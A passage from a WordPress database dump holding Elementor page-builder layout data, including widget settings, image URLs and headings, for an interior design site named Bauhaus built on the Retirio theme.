":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4156,4911,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4157,4911,'_elementor_pro_version','3.8.1'),(4158,4911,'_elementor_css','a:6:{s:4:\"time\";i:1695375026;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4159,4912,'_wp_page_template','elementor_header_footer'),(4160,4912,'_elementor_edit_mode','builder'),(4161,4912,'_elementor_template_type','wp-page'),(4162,4912,'_elementor_version','3.8.1'),(4163,4912,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Let\'s turn your ideas into reality\\\"<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 